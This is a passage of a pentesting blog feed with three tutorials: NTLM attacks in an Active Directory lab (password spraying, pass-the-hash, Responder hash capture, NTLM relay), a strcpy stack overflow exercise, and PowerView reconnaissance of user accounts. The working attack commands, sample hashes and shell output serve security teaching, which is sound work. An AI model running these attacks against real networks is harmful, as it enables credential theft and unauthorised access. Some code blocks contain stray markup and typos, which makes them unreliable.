After exploring NTLM&apos;s foundations, let&apos;s delve into its authentication process. This process elegantly unfolds in three distinct steps: Negotiate, Challenge, and Authenticate, each playing a vital role in the authentication symphony.

1.  **Negotiate: Setting the Stage**  
    The Negotiate message is like the opening act, initiating the authentication process. Here, it&apos;s not just a casual hello; it proposes the NTLM protocol version to be used. Think of it as laying down the ground rules for the conversation.
2.  **Challenge: The Server&apos;s Move**  
    Responding to the negotiate message, the server throws a challenge – a string of pseudo-random characters, like a cryptic puzzle to be solved. Along with this, it confirms the NTLM protocol version and shares essential details like the Hostname and domain name. This step is crucial; it&apos;s the server&apos;s way of ensuring that the client is ready for the next move.
3.  **Authenticate: The Final Check**  
    Now it&apos;s the client&apos;s turn to shine. The client takes the server&apos;s challenge and encrypts it using the user&apos;s NT hash, crafting what&apos;s known as the Net-NTLM hash. This encrypted message, sent back to the server, is like the client&apos;s secret handshake. The server, upon verifying this response, completes the user&apos;s authentication. It&apos;s the final nod of approval, sealing the deal on the user&apos;s identity.

Each step in this process is meticulously designed for maximum security, ensuring that user authentication is both robust and reliable. It&apos;s a testament to the elegant complexity of NTLM, balancing security needs with efficient communication.

# **Transitioning to NTLM Attacks**

With a clear understanding of the NTLM authentication process, we&apos;re now well-equipped to delve into the realm of NTLM attacks. This next section will illuminate the strategies and vulnerabilities inherent in NTLM&apos;s design.

## **Reconnaissance Tasks: Gathering Intelligence**

Remember our journey through [chapter three](https://www.kayssel.com/post/active-directory-3-windows-computers/)? We used SMB via Python and the Impacket library to nudge NTLM into revealing domain information. Tools like &quot;ntlm-info&quot; are also key players in this reconnaissance game. The server&apos;s &quot;Challenge&quot; message is a treasure trove, potentially spilling secrets like domain name, hostname, and even the operating system version.

![](/content/images/2023/04/image.png)

Information obtained by forcing the use of NTLM via SMB

## **From Reconnaissance to Credentials**

Now, shifting our focus from general attacks, we explore how NTLM is integral in credential discovery and validation. SMB is often the path of choice here, given its widespread activation across active directory systems. Imagine you have a list of users and suspect that &quot;Password1&quot; might be a common password. Here&apos;s how you&apos;d test that theory:

```bash
crackmapexec smb 192.168.253.130 -u users.txt -p Password1

```

![](/content/images/2023/04/crackmap.png)

Password Spraying diagram

This method, known as &quot;Password Spray,&quot; involves trying the same password with multiple users to sniff out valid credentials. While we&apos;ve used crackmapexec here, alternatives like Kerbrute employ the Kerberos protocol for user enumeration.

Once credentials are in hand, crackmapexec can also validate them across different domain machines, determining access levels and privileges. Symbols like \[+\], \[-\], and (Pwn3d!) indicate access status. This last one is the most important since it indicates the possibility of remote command execution.

![](/content/images/2023/04/image-6.png)

Sample credential checking via NTLM using SMB

## **Brute Force: The Last Resort**

In desperate times, brute force attacks come into play. They&apos;re the digital equivalent of trying every key on the keyring:

```bash
crackmapexec smb 192.168.253.128 -u &quot;ironhammer&quot; -p password.txt

```

Remember, domain password policies are crucial here. These attacks can lock out user accounts, so understanding the policy is vital. You can use crackmapexec with a valid user to fetch this policy:

```bash
crackmapexec smb 192.168.253.128 -u &quot;beruinsect&quot; -p &quot;Password3&quot; --pass-pol

```

![](/content/images/2023/04/image-10.png)

Password Policy

An example of a weak password policy, with no account lock threshold, suggests free rein for brute force attacks without the worry of hindering user activities.

## **Introducing Pass the Hash Technique**

Having looked at credentials, we now move to one of NTLM&apos;s most notable techniques - &apos;Pass the Hash&apos;. Picture this: Instead of using the actual password, this clever trick passes the NT hash of the user&apos;s password. It&apos;s a digital sleight of hand, possible because NTLM&apos;s authentication process uses the NT hash, not the plain text password.

Imagine we&apos;ve managed to dump the SAM of a Domain computer (as outlined in [chapter 4](https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems/)). With this in hand, we unlock the ability to use the NT hash of various users. This is like having a master key – we can now explore where these users have access and their privileges, all without needing their actual password. It&apos;s a bit like being a digital locksmith.

```bash
SHADOW.local\beruinsect:1103:aad3b435b51404eeaad3b435b51404ee:c4b0e1b10c7ce2c4723b4e2407ef81a2:::

```

NT hash

![](/content/images/2023/04/image-11.png)

Pass the hash with crackmapexec

Let&apos;s say we hit the jackpot and get a &quot;pwn3d!&quot; result in crackmapexec. Now, the door is wide open for us to execute commands:

```bash
cracmpaexec smb &lt;ip&gt; -u &lt;user&gt; -H &lt;nt_hash&gt; -x &lt;command_to_execute&gt;

```

![](/content/images/2023/04/image-12.png)

Pass the hash to execute commands

This command is our magic wand, turning possibilities into realities. And there&apos;s more – we can conjure up an interactive shell using tools like psexec or evil-winrm. It&apos;s like stepping into the digital world of the target machine:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ impacket-psexec beruinsect@192.168.253.131 -hashes &quot;:c4b0e1b10c7ce2c4723b4e2407ef81a2&quot;
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 192.168.253.131.....
[*] Found writable share ADMIN$
[*] Uploading file ESkUGYGM.exe
[*] Opening SVCManager on 192.168.253.131.....
[*] Creating service NseE on 192.168.253.131.....
[*] Starting service NseE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;

```

Or, for a different flavor of digital intrusion:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ evil-winrm -u vaan -H &quot;64f12cddaa88057e06a81b54e73b949b&quot; -i 192.168.253.130

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\vaan\Documents&gt;

```

&quot;Pass the Hash&quot; is more than just an attack; it&apos;s a testament to NTLM&apos;s intricacies and a reminder of the ever-evolving landscape of network security.

## **Connecting to Net-NTLM Hashes Retrieval**

After exploring the &apos;Pass the Hash&apos; technique, a key exploit within NTLM, we now turn our attention to another crucial aspect: retrieving Net-NTLM hashes. This step is vital in active directory security auditing, where uncovering valid credentials often proves challenging.

Venturing into the realm of active directory security auditing can be a tough nut to crack, especially when hunting for valid credentials. But there&apos;s a tool for that – &quot;[Responder](https://github.com/lgandx/Responder),&quot; a master at man-in-the-middle attacks to snag those elusive Net-NTLM hashes from users. It&apos;s like setting a digital trap in the organization&apos;s internal network (sorry, VPN users, this won&apos;t work for you). Here&apos;s how you set the stage:

```bash
sudo responder -I eth0

```

This command is the conductor of a two-part orchestra:

1.  **Poisoning Protocols:** MDNS, LLMNR, and NBT-NS protocols are subtly manipulated to reroute network resource resolutions. It&apos;s like laying out digital breadcrumbs, leading unsuspecting connections right to the attacker&apos;s lair.
2.  **Setting up Malicious Servers:** These servers are the puppeteers, pulling the strings to make NTLM the go-to for all incoming connections.

With this setup, you&apos;re not just intercepting traffic; you&apos;re capturing Net-NTLM hashes as they waltz through the NTLM authentication process. It&apos;s a stealthy move, akin to a magician&apos;s sleight of hand.

To make this even more effective, let&apos;s say a user tries to access a nonexistent network share while Responder is lurking in the shadows. That&apos;s when you catch the prized Net-NTLMv2 hash.

![](/content/images/2023/04/image-13.png)

Search for a network resource that does not exist for a user

![](/content/images/2023/04/image-15.png)

Prompt shown to the user, triggered by &quot;responder&quot;

![](/content/images/2023/04/image-16.png)

Net-NTLMv2 hash capture

Got the hash? Now it&apos;s time to crack it open using hashcat, the digital equivalent of a safe cracker:

```bash
hashcat -m 5600 hashresponder.hashcat /usr/share/wordlists/rockyou.txt

```

![](/content/images/2023/04/image-17.png)

Net-NTLMv2 cracking

This approach to obtaining Net-NTLM hashes is more than just a technical feat; it&apos;s a dance of strategy, timing, and skill, proving that sometimes the most effective attacks are those that remain unseen.

## **Leading to NTLM Relay Attack**

### **Introduction to NTLM Relay Attack**

From capturing hashes, we now transition to a more direct form of attack - the NTLM Relay. A sophisticated technique that hijacks connections through protocol poisoning. This strategy revolves around rerouting connections, initially aimed at the attacker&apos;s computer, to a target machine. The key? These intercepted connections, especially from administrator users, become a powerful tool for executing commands on the target system.

![](/content/images/2023/04/image-24.png)

NTLM Relay attack

### **Setting Up: Configuring the Players**

For this attack to hit the mark, the captured connections must come from a user with administrator privileges on the victim machine. It&apos;s like choosing the right chess piece for a strategic move. Here&apos;s how to set the stage:

-   **Elevating User Privileges:** First, dive into &quot;Computer Management&quot; and access &quot;Local Users and Groups.&quot; Navigate to &quot;Groups&quot; and elevate your chosen user to the administrator level. It’s like handing them the digital keys to the kingdom.

![](/content/images/2023/04/image-19.png)

Iron in the administrator&apos;s group

-   **Prepping the Stage:** Tweak the basic Responder configuration to prevent conflicts with upcoming tools. This involves editing the responder.conf file to turn off SMB and HTTP, ensuring a clear path for our next move.

![](/content/images/2023/04/image-20.png)

Responder configuration

### **Launching the Attack: The Dance of Protocols**

With the setup complete, launch Responder to start the protocol poisoning:

```bash
sudo responder -I eth0

```

This command is the opening gambit, manipulating LLMNR, MDNS, and NBT-NS protocols to funnel connections towards the attacker&apos;s machine.

### **Enter ntlmrelayx: Redirecting Connections**

The next step involves ntlmrelayx, a tool that strategically redirects these connections to the target machine, like a digital redirect sign:

```bash
impacket-ntlmrelaxy -tf targets.txt -smb2support

```

```bash
# targets.txt
192.168.253.131

```

### **Executing the Attack: The Moment of Truth**

Once the poisoned request from the &apos;iron&apos; user is captured, it’s rerouted to PC-BERU. If &apos;iron&apos; has administrator access, the floodgates open to command execution. The attack&apos;s climax is marked by dumping the SAM, revealing the sensitive underbelly of the target system.

![](/content/images/2023/04/image-21.png)

Attack preparation

![](/content/images/2023/04/image-22.png)

NTLM Relay with responder and ntlmrelayx

### **Crafting the Illusion: Forcing a Connection**

The final act involves luring a user into accessing a nonexistent network resource. When the attack concludes, the user is met with an error message – the only visible sign of the intricate dance that just occurred in the digital shadows.

![](/content/images/2023/04/image-23.png)

Error caused by ntlmrelayx

# **Conclusion: Navigating the Intricacies of NTLM Security**

As we conclude our exploration of NTLM, it&apos;s clear that this protocol is a double-edged sword in the realm of network security. From the sophisticated &quot;Pass the Hash&quot; technique to the cunning NTLM Relay attacks, we&apos;ve seen how NTLM can be both a stalwart defender and a vulnerable point of exploitation.

Our journey has taken us through various tactics, from reconnaissance and credential discovery to man-in-the-middle attacks. Each method has demonstrated the importance of understanding NTLM&apos;s nuances, not just for exploiting its weaknesses but also for fortifying its defenses.

The tools and techniques discussed — Responder for capturing Net-NTLM hashes, crackmapexec for credential validation, and the strategic use of ntlmrelayx — highlight the need for continuous vigilance and adaptation in the ever-evolving landscape of network security.

This article serves as a reminder that in the digital world, knowledge is power. Understanding the capabilities and vulnerabilities of protocols like NTLM is crucial for both attackers and defenders in the cybersecurity arena. As we continue to navigate these digital waters, let&apos;s carry forward the insights and lessons learned, ensuring we stay one step ahead in the ongoing game of network security.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What three main messages does the NTLM authentication process consist of?&lt;/summary&gt;

It consists of &quot;Negotiation&quot;, &quot;Challenge&quot; and &quot;Authentication&quot;.

![](/content/images/2023/04/image-2.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What information were you able to collect that may be of interest during the NTLM authentication process?&lt;/summary&gt;

I can find out the HostName of the machine as well as the version of the operating system it is using. To find this information, I can use the tool &quot;ntlm-info&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I use crackmpexec to validate users in the domain ? Can I differentiate with the result if the user is a local administrator or not ?&lt;/summary&gt;

Once valid credentials are found, we can use the following command to validate whether the user exists or not. Likewise, if the response shows &quot;Pwn3d!&quot; it will mean that the user is an administrator on the machine.

![](/content/images/2023/04/image-6.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What attack can I use to obtain Net-NTLMv2 hashes? What attack can I use to obtain Net-NTLMv2 hashes?&lt;/summary&gt;

I can poison network resolution protocols such as LLMNR, NBT-NS or MDNS to force authentication attempts against my machine when it is looking for network resources that do not exist. To perform this attack, I can use the Responder tool.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What attack involving NTLM can I use to dump the SAM of a machine and what condition must be met for this to happen?&lt;/summary&gt;

We can use the NTLM Relay attack. To dump the SAM of the machine to which the connections are redirected, we have to capture incoming connections from an administrator user on that machine.
&lt;/details&gt;

# References

[NTLM Relay](https://en.hackndo.com/ntlm-relay/)

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[A Detailed Guide on Responder (LLMNR Poisoning) - Hacking Articles](https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring Buffer Overflow Exploits: A Practical Guide with Dynamic Analysis</title><link>https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-exploitation-5-smash-the-stack</guid><description>We explore vulnerable code, disabling defenses and utilizing radare2 for dynamic analysis. Focusing on &apos;strcpy&apos; and &apos;Smash the Stack&apos; attack, we manipulate a buffer to alter &apos;modified&apos;. The article covers buffer overflow, debugging, and the significance of testing various payloads</description><pubDate>Fri, 14 Apr 2023 10:15:04 GMT</pubDate><content:encoded># **Unlocking the Secrets of Vulnerable Code: A Journey into Exploit Development**

Welcome to an exhilarating foray into the world of exploit development, where we transform theory into action. In this guide, we&apos;re not just learning about exploits; we&apos;re actively creating one. Our task is to manipulate a seemingly innocuous variable named &quot;modified&quot; and turn it into the key that unlocks a hidden message. This adventure also serves as your introduction to the art of dynamic code analysis, an indispensable skill in the exploit writer&apos;s toolkit. So, gear up for an exciting journey through the labyrinth of vulnerable code, where each line holds a clue, and every command unravels part of the mystery.

# **From Introduction to Exploration: Diving Into the Code**

As we transition from our introduction to the practical aspects, let&apos;s start our hands-on journey. Our mission is simple yet intriguing: manipulate the value of the variable &quot;modified&quot; to unlock a specific message. Ready to dive in? Here&apos;s the code that will be our playground:

```c
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, &quot;please specify an argument\n&quot;);
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf(&quot;you have correctly got the variable to the right value\n&quot;);
  } else {
      printf(&quot;Try again, you got 0x%08x\n&quot;, modified);
  }
}

```

# **Bridging Exploration and Compilation: Understanding Our Code&apos;s Foundation**

Now that we&apos;ve explored the vulnerable code, let&apos;s delve deeper into its structure and see how it behaves when compiled. We&apos;ll disable certain operating system defenses to delve deeper into how our code behaves during execution.

```bash
[rsgbengi@kaysel]: gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack1 stack1.c

[rsgbengi@kaysel]:./stack1 subscribe
Try again, you got 0x00000000

```

As seen from this initial run, a &quot;normal&quot; execution doesn&apos;t modify the &quot;modified&quot; variable as intended, leaving us with the unfulfilled condition.

## Understanding the Stack Status

**The Execution State**: To grasp this technique fully, we need to understand the program&apos;s execution state once it enters the main function. A diagram of this state can be incredibly helpful.

![](/content/images/2023/04/pila.png)

Stack status before execution

**Function Prologue and Stack Layout**: As we observed in a previous chapter, the function&apos;s prologue (executed by the `entry0` function in radare2) places the old EBP and the return address on the stack. Inside the main function, the values of &quot;modified&quot; and &quot;buffer&quot; are also stacked, following the order they are defined in the source code. First, we have &apos;modified&apos;, and then &apos;buffer&apos;, reflecting their declaration order:

```c
int main(int argc, char **argv)
{
  volatile int modified; //First Modified
  char buffer[64]; //Second buffer
  ...

```

# **Linking Compilation to Analysis: Uncovering the Code&apos;s Inner Workings**

With our code compiled and its execution state understood, we move to a more detailed analysis with radare2. Let’s break down the process of parsing and analyzing the binary to reveal the secrets hidden in its code.

## Parsing the Binary with radare2

-   **Initializing Analysis**: Start by analyzing the binary with the `aaa` command. This sets the stage for a thorough examination.
-   **Listing Functions**: Next, use `afl` to list all the available functions. Here, our prime focus will be the main function – the heart of our vulnerable code.

![](/content/images/2023/04/functions.png)

Sample functions of the binary

## Dissecting the Main Function

-   **Code Disassembly**: To disassemble and inspect the main function, the `pdf` command is your tool of choice. It lays bare the function&apos;s code, making it accessible for analysis.
-   **Understanding the Prologue**: The function&apos;s prologue is our first point of interest. Here, you&apos;ll notice the creation of a 44-byte space in the stack. This space is divided between the 40-byte buffer and a 4-byte variable &quot;var\_4h&quot;.
-   **Type Transformations with rax2**: radare2&apos;s `rax2` tool is handy for conversions. For instance, to understand what 64 characters translate to in bytes:

```bash
[rsgbengi@kaysel]$ rax2 64
0x40

```

## Analyzing Key Code Segments

-   **Argument Check**: The second key segment involves checking if an argument is provided. Absence of an argument triggers an error message.
-   **Buffer Manipulation**: The third critical part sets up registers to copy user-provided content into the buffer using `strcpy`.
-   **Variable Comparison**: Next, the code compares &quot;var\_4h&quot; (&quot;modified&quot; in C) with `0x61626364`. Matching this value triggers a success message; else, an error is displayed.
-   **Function Epilogue**: The final point of analysis is the function&apos;s epilogue.

![](/content/images/2023/04/codigoVulnerable.png)

Disassembled code Sample

## Visualizing Code Flow

**Enhanced Visualization**: To better understand the code&apos;s flow, especially the jumps caused by if/else conditions, use the `VV` command in radare2. This provides a visual representation, making it easier to follow the code’s logic.

![](/content/images/2023/04/mapa.png)

Sample code graph

# **Connecting Analysis to Vulnerability Exploration: Identifying Weaknesses**

Having analyzed the code in detail, let’s identify the vulnerabilities that we can exploit, starting with the risks associated with &apos;strcpy&apos;. It&apos;s here that our code&apos;s defenses begin to crumble, laying bare a path for us to explore and exploit its frailties. Let&apos;s delve into this vulnerability and uncover how it becomes a gateway for potential attacks.

## **The Perils of &apos;strcpy&apos;: A Closer Look**

**Spotting the Flaw:** A glance at the `strcpy` manual reveals a glaring oversight. Picture this: `strcpy` diligently copies characters into a buffer, blissfully unaware if there&apos;s enough room. It&apos;s akin to trying to fit a gallon of water into a pint glass – a messy overflow is a foregone conclusion.

**A Hacker&apos;s Preferred Tool:** For those in the hacking trade, exploiting fixed-length string buffers is like striking gold. The simplicity of `strcpy`, with its blatant disregard for checking available space, makes it an ideal target for buffer overflow escapades.

**Beware of Complacency:** It&apos;s a risky business to assume that an overflow is off the table. Code is like a living entity, evolving and adapting. Today&apos;s impossibilities might become tomorrow&apos;s vulnerabilities.

## **Buffer Overflow Attack: Leaving the Door Ajar**

**Exploiting the Gap:** Our code, in its current form, fails to measure the incoming characters against the buffer&apos;s capacity, essentially rolling out the red carpet for a buffer overflow attack. It’s like inadvertently leaving the key in the lock, an open invitation for attackers to waltz in and seize control.

# **From Vulnerability to Exploitation: Setting the Stage for the Attack**

Understanding the risks of &apos;strcpy&apos; sets us up for the next phase, where we manipulate a data buffer in the stack. Here, we manipulate a data buffer in the stack, pushing it beyond its limits. The central exploit? A flaw in the `strcpy` function that lets us sneak in more data than the buffer is meant to handle. It&apos;s a bit like overstuffing a suitcase until the seams give way.

Our mission? To alter the &quot;modified&quot; variable, the unsuspecting hero of our story, by breaching the buffer&apos;s boundaries.

While buffer overflows often aim to manipulate the return address, that&apos;s a tale for another time. Today, we focus on the fundamental strategies of this digital heist.

![](/content/images/2023/04/desbordamiento.png)

Buffer Overflow diagram

## **Laying the Groundwork for the Attack: A Precise Approach**

After grasping the concept of buffer overflow, our next step is to prepare the program for the attack feeding the program exactly 64 bytes. It&apos;s like setting the chessboard before the masterstroke. The subsequent 4 bytes we enter are like secret codes, clandestinely tweaking the &quot;modified&quot; variable. This phase is akin to gaining VIP access to the hidden mechanisms of the program.

Here&apos;s a quirky fact: each character counts as one byte. So, why not play around with 64 &quot;A&quot; characters? It&apos;s followed by a cryptic sequence translating to &quot;0x64/0x63/0x62/0x61,&quot; our recipe for success. To decipher these enigmatic characters, we consult our digital oracle, `rax2`:

```bash
[rsbengi@kaysel]$ rax2 -s 64636261
dcba

```

Now, it&apos;s time to wield our programming wand with Python, conjuring up the perfect payload:

```bash
[rsgbengi@kaysel]$ python3 -c &quot;print(&apos;A&apos;*64+&apos;dcba&apos;)&quot; 
&lt;details&gt;
&lt;summary&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba&lt;/summary&gt;

```

## **Revealing the Exploit: Bringing Our Plan to Fruition**

With the groundwork laid, it&apos;s time to see our plan in action and witness the fruits of our labor. And, like magic, the program succumbs to our cunning. The moment of triumph is illustrated in the image below – a testament to a well-executed exploit.

![](/content/images/2023/04/Pasted-image-20230319175808.png)

Successful program execution

# **Reflecting on Our Journey: Debugging and Analysis**

As we celebrate our successful exploit, it&apos;s crucial to reflect on the process and understand what went behind the scenes. This is where a little knowledge of reverse engineering and dynamic analysis comes in handy. Think of it as the behind-the-scenes work that makes the magic happen.

We use `radare2` with a special `-d` flag for this part, like a director calling action on a movie set:

```bash
&lt;/details&gt;

[rsgbengi@kaysel]$ r2 -d stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba

```

## **Zooming in on the Main Function**

Our main area of interest is, quite literally, the main function. To get there, we need to play a bit of a navigation game. It starts with finding the memory address of the main function&apos;s first instruction. We use the &quot;pd&quot; command for this – think of it as our digital compass. After pinpointing the location, we set a breakpoint using the &quot;db&quot; command. It&apos;s like bookmarking a crucial page in a mystery novel.

Next, we use the &quot;dc&quot; command to proceed to this breakpoint. It&apos;s a bit like fast-forwarding a movie to the good part.

![](/content/images/2023/04/dynamic.png)

Advance the code to the main function

## **Navigating the Program with Precision**

Once we&apos;re in the heart of the main function, our journey continues one step at a time, using the &quot;ds&quot; command. For those who prefer a more visual approach, we switch to a Terminal User Interface (TUI) environment with the &quot;v&quot; command. Here, each instruction unfolds like a scene in a play, providing a clear view of the stack and register status.

In the image below, you&apos;ll notice an abundance of &quot;0x41&quot;, a digital signature of our &quot;A&quot; characters. It&apos;s like finding breadcrumbs that lead back to our initial steps.

![](/content/images/2023/04/Pasted-image-20230321204419.png)

Sample radare2 user interface

## **Unraveling the Variables&apos; Tale**

Diving further, we see how our payload has subtly altered the narrative. The variable &quot;var\_4h&quot;, representing &quot;modified&quot;, now holds the value we introduced (dcba). It’s like watching a character in a story evolve based on the decisions we made earlier. Meanwhile, &quot;var\_44h&quot;, akin to our buffer in the source code, marks the starting point of our buffer journey.

![](/content/images/2023/04/Pasted-image-20230321203921.png)

Sample variables and their corresponding values in the code

## **Decoding the Exploit&apos;s Success**

This analytical journey helps us unravel the mystery behind why our exploit works. While in this instance we hit the jackpot on our first try, it&apos;s usually not this straightforward. Learning to conduct test cases with various payloads is akin to a chef tweaking a recipe to perfection. It’s an essential skill for making an exploit work, much like finding the right ingredients for a gourmet dish.  

# **Mastering the Art of Exploitation: Insights and Next Steps**

As we reach the end of this journey, it&apos;s clear that the world of code exploitation is both complex and fascinating. Through our hands-on exploration with radare2, we&apos;ve not only unlocked the secrets of a vulnerable piece of code but also gained valuable insights into the methodologies and thought processes behind successful exploits.

## **Key Takeaways**

1.  **Buffer Overflow Basics:** We&apos;ve seen how buffer overflows can be exploited to manipulate data and control program flow, a fundamental concept in the world of hacking.
2.  **Dynamic Analysis Mastery:** The use of radare2 has empowered us to dissect and understand code at a deeper level, showcasing the power of dynamic analysis in exploit development.
3.  **Strategic Exploitation:** Our exploration has highlighted the importance of strategic thinking, from padding and debugging to payload insertion, in creating successful exploits.

## **Looking Ahead**

As you continue your journey in exploit development, remember that each piece of code offers a new challenge and an opportunity to refine your skills. The techniques and insights gleaned here are just the beginning. With practice and perseverance, you can transform these foundational skills into a potent toolset for uncovering and exploiting vulnerabilities in software.

## **Final Thought**

The path of an exploit developer is one of constant learning and adaptation. Stay curious, keep experimenting, and never stop exploring the depths of code. Who knows what secrets you&apos;ll unlock next?

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is a buffer overflow? What is usually used for?&lt;/summary&gt;

It is a vulnerability that consists of overflowing a buffer to modify data outside the memory occupied by that particular buffer.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you give me an example of buffer overflow utility ?&lt;/summary&gt;

It is commonly used to change the value of the return address in such a way as to modify the program execution flow. However, it can also be used, for example, to change the value of variables used by the program, thus causing anomalous behavior.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What methodology can we use to exploit a buffer overflow?&lt;/summary&gt;

-   First, we introduce a padding to see when the program crashes.
-   Next, we use a debugger to analyze where the target to modify is located and how much padding we have to add to modify it.
-   Finally we incorporate at the end of the padding the payload that we want to introduce in the vulnerable code.
&lt;/details&gt;

# References

[radare2/doc/intro.md at master · radareorg/radare2](https://github.com/radareorg/radare2/blob/master/doc/intro.md)

[Ataque “Smash the stack” · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/buffer-overflow/1-practica.html)</content:encoded><author>Ruben Santos</author></item><item><title>User-Centric Pentesting: Unveiling Secrets with PowerView and PowerSploit</title><link>https://www.kayssel.com/post/active-directory-5</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-5</guid><description>Explore Active Directory in-depth: Learn to identify key user accounts, decrypt secrets with NT/LM hashes and Kerberos keys, understand computer accounts, and strategically manage user groups for effective penetration testing.</description><pubDate>Fri, 31 Mar 2023 15:39:53 GMT</pubDate><content:encoded># **Introduction: Delving Deeper into Active Directory for Penetration Testing**

Welcome to another insightful chapter in our ongoing series focused on mastering penetration testing within Active Directory environments. As we delve deeper into this complex and critical aspect of network security, this chapter is designed to expand your understanding and skills in navigating Active Directory&apos;s multifaceted landscape.

In this installment, we turn our attention to the intricate details that often make the difference between a surface-level understanding and a profound mastery of penetration testing. We will explore the nuances of user properties and secrets, understand the pivotal role of computer accounts, and dissect the strategic importance of groups within Active Directory.

Our journey will not only guide you through the process of identifying and analyzing key user accounts and their encrypted secrets but will also delve into the significant role of groups in privilege management. This chapter aims to provide you with the knowledge and tools necessary to navigate and exploit these systems more effectively, enhancing your capabilities as a cybersecurity professional.

Join me as we continue to unravel the complexities of Active Directory, paving the way for more advanced techniques and strategies in our series. Whether you&apos;re a seasoned expert or just starting in the field, this chapter is set to enrich your understanding and approach to penetration testing in these ubiquitous and vital network environments.

```bash
evil-winrm -i 192.168.253.130 -u vaan -p &apos;Password1&apos; -s powershellscripts/

```

![](/content/images/2023/03/installPowerview.png)

Command execution via evil-winrm

Join me as we dive into this exciting phase, where understanding the user landscape becomes key to mastering penetration testing in Active Directory environments.

# **Exploring User Properties in Active Directory for Penetration Testing**

In the fascinating world of Active Directory penetration testing, knowing your way around user properties is like having a master key. With PowerView, part of the versatile PowerSploit framework, we unlock a treasure trove of information about users in the domain. Let&apos;s dive into how this powerful tool can be your ally in uncovering critical user details.

## Getting to Know Users with PowerView

-   **The Initial Command**: The journey begins with `Get-NetUser`. This simple yet potent command opens the door to an array of user properties, including the elusive Security Identifier (SID). Remember, the SID is a unique identifier, part domain, part user, and understanding it is like learning a secret language of Windows programs.
-   **The Importance of &apos;Distinguished Name&apos;**: The &quot;distinguishedname&quot; property is our map to the domain&apos;s NTDS, guiding us through the maze of user queries.

![](/content/images/2023/03/userProperties.png)

Getting users through powerview

## Focusing Your Search

-   **Zooming In on Users**: Need details about a specific user? Just ask PowerView: `Get-NetUser -Username &lt;user&gt;`.
-   **The User Roster**: For a bird&apos;s-eye view of all domain users, simply run `Get-NetUser | select cn`. It&apos;s like having the entire domain&apos;s roll call at your fingertips.

## Advanced User Reconnaissance

-   **Property-Based Filtering**: Dive deeper with filters like `Get-NetUser -Properties pwdlastset` to get insights into password settings.
-   **Unearthing Hidden Treasures in Descriptions**: Often, user descriptions are gold mines, sometimes hiding passwords in plain sight. A command like `# Get-NetUser -Properties description` can lead you to unexpected discoveries.

### Streamlining Searches in Vast Domains

**Hunting for Password Clues**: In larger domains, where user lists are as vast as the ocean, use a more targeted approach to fish for potential passwords hidden in descriptions:

```powershell
# Get-NetUser -Properties description 
*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetUser -Properties description 

description
-----------
Built-in account for administering the computer/domain
Built-in account for guest access to the computer/domain
Key Distribution Center Service Account
The password is Password1

&lt;details&gt;
&lt;summary&gt;My password is Password3&lt;/summary&gt;

```

```powershell
&lt;/details&gt;

*Evil-WinRM* PS C:\Users\vaan\Documents&gt; Get-NetUser -Properties description,cn | select-string &quot;Pass&quot;

@{cn=Beru Insect; description=The password is Password1}
@{cn=SQL Service; description=My password is Password3}

```

## Bringing It to Life in a Lab

-   **Practical Application**: To see these techniques in action, venture into a domain controller setup under Tools → Active Directory Users and Computers. It’s like setting up your own playground to experiment and see firsthand how these commands perform in a controlled environment.

![](/content/images/2023/03/Pasted-image-20230305110109.png)

Description of a user

## **User Secrets: Deciphering the Storage Formats in Windows**

In our journey through Active Directory penetration testing, understanding how user secrets are stored on Windows machines is a game-changer. Let&apos;s dive deeper into the formats used for storing these secrets, shifting our focus from retrieval techniques to the actual structure and encryption of these credentials.

### The Encryption Landscape: NT/LM Hashes and Kerberos Keys

-   **Beyond Plain Text**: First off, it&apos;s crucial to know that Windows doesn&apos;t store user passwords in plain text. Instead, it encrypts them, primarily using &quot;NT/LM hashes&quot; and &quot;Kerberos keys.&quot;
-   **NT/LM Hashes Unveiled**:
    -   **Location**: These hashes are found in the SAM (Security Accounts Manager) for local user credentials, and in the NTDS (NT Directory Services) for domain user credentials.
    -   **NT Hash**: This is the modern standard. It&apos;s the encrypted form of the user password predominantly in use.
    -   **LM Hash**: An older, less secure format, not actively used since Windows Vista/Server 2008 due to its vulnerability to cracking. However, its presence persists in SAM and NTDS for backward compatibility with older Windows applications.
    -   **Hash Example**:

```bash
&lt;username&gt;:&lt;rid&gt;:&lt;LM&gt;:&lt;NT&gt;::: 
